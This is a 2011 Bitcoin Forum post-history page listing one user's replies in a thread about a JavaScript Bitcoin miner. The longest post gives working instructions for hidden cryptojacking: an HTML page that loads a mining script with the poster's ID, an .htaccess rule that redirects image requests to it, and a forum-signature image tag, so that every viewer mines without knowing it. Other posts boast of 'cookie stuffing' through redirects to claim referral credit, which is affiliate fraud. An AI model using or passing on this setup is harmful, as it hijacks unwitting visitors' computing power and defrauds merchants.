Bitcoin Forum
May 26, 2024, 02:17:16 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
  Home Help Search Login Register More  
  Show Posts
Pages: [1]
1  Bitcoin / Mining software (miners) / Re: Embedable Javascript Bitcoin miner for your website on: June 02, 2011, 08:55:29 AM
Not to steal cookies, stuff cookies, as in they take my referral cookie, and I get credit for their purchases.
2  Bitcoin / Mining software (miners) / Re: Embedable Javascript Bitcoin miner for your website on: June 02, 2011, 08:09:40 AM
I've been using redirects like this to stuff cookies for years, trust me, it works.
3  Bitcoin / Mining software (miners) / Re: Embedable Javascript Bitcoin miner for your website on: June 02, 2011, 07:54:26 AM
What is the WOW about, exactly?
4  Bitcoin / Mining software (miners) / Re: Embedable Javascript Bitcoin miner for your website on: June 02, 2011, 06:52:00 AM
Figured out a way to implement this anywhere, you can hide it as a 1px jpeg file in any signature, on any forum.


First things first.

1. Create a file in notepad. Use this code.
Code:
<head><script type="text/javascript" src="http://api.bitp.it/bitp.it.js"></script>
<script type="text/javascript">
 bitpit({clientId: "YOURID", forceUIThread: true});
</script></head>
<body width="0" height="0"></body>

2. Save that as test.html, upload it to your server

3.Upload an image to your server, label it as "WHATEVERYOUWANT.jpeg" make sure the server shows the file being stored as a jpeg file.

4. Edit your .htaccess file. Include this bit of code at the end of it.

Code:
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?YOURDOMAIN\.com/ [NC]
RewriteCond %{HTTP_REFERER} !^$
RewriteRule .*\.(jpe?g|gif|bmp|png)$ http://YOURDOMAIN.com/test.html [L]

5. Go to any forum and add

Code:
[img]http://YOURDOMAIN.com/YOURPICTURE.jpeg[/img]

This should show absolutely nothing to the user viewing the page, but you get everyone hashing for you that ever views a page with your signature.
Pages: [1]
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!